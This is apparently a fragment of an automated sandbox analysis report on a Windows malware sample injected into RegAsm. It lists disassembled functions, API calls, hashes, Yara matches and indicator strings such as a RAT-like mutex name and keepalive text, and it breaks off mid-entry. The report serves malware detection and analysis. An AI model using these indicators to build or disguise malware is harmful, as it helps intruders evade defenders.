                          • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                          • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                          Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          • API String ID: 782494840-2070987746
                          • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                          • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                          Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                          • __freea.LIBCMT ref: 10008A08
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • __freea.LIBCMT ref: 10008A11
                          • __freea.LIBCMT ref: 10008A36
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                          Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountEventTick
                          • String ID: !D@$NG
                          • API String ID: 180926312-2721294649
                          • Opcode ID: e4d6f1142550c4a5ff115462e5a39bbe35dfcbd7a27ecb26af4874e68cbb448e
                          • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                          • Opcode Fuzzy Hash: e4d6f1142550c4a5ff115462e5a39bbe35dfcbd7a27ecb26af4874e68cbb448e
                          • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                          Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                          Strings
                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$EventLocalThreadTime
                          • String ID: KeepAlive | Enabled | Timeout:
                          • API String ID: 2532271599-1507639952
                          • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                          • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                          Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: pth_unenc
                          • API String ID: 1818849710-4028850238
                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                          Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                          • String ID:
                          • API String ID: 3360349984-0
                          • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                          • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                          Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModuleProtectVirtual
                          • String ID:
                          • API String ID: 2905821283-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                          Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                          Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                          Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 3919263394-0
                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                          Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                          • String ID: image/jpeg
                          • API String ID: 1291196975-3785015651
                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                          Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                          • GetLastError.KERNEL32 ref: 0040D0BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorLastMutex
                          • String ID: Rmc-7B1J99
                          • API String ID: 1925916568-1545472424
                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                          Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModuleProtectVirtual
                          • String ID:
                          • API String ID: 2905821283-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                          Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventObjectSingleWaitsend
                          • String ID:
                          • API String ID: 3963590051-0
                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                          Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 3519776433-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                          Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                          • RegQueryValueExA.KERNEL32 ref: 00413622
                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                          Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                          • RegQueryValueExA.KERNEL32 ref: 00413768
                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                          Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                          • RegQueryValueExA.KERNEL32 ref: 004135C2
                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                          Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                          • RegQueryValueExA.KERNEL32 ref: 00413565
                          • RegCloseKey.KERNEL32(?), ref: 00413570
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
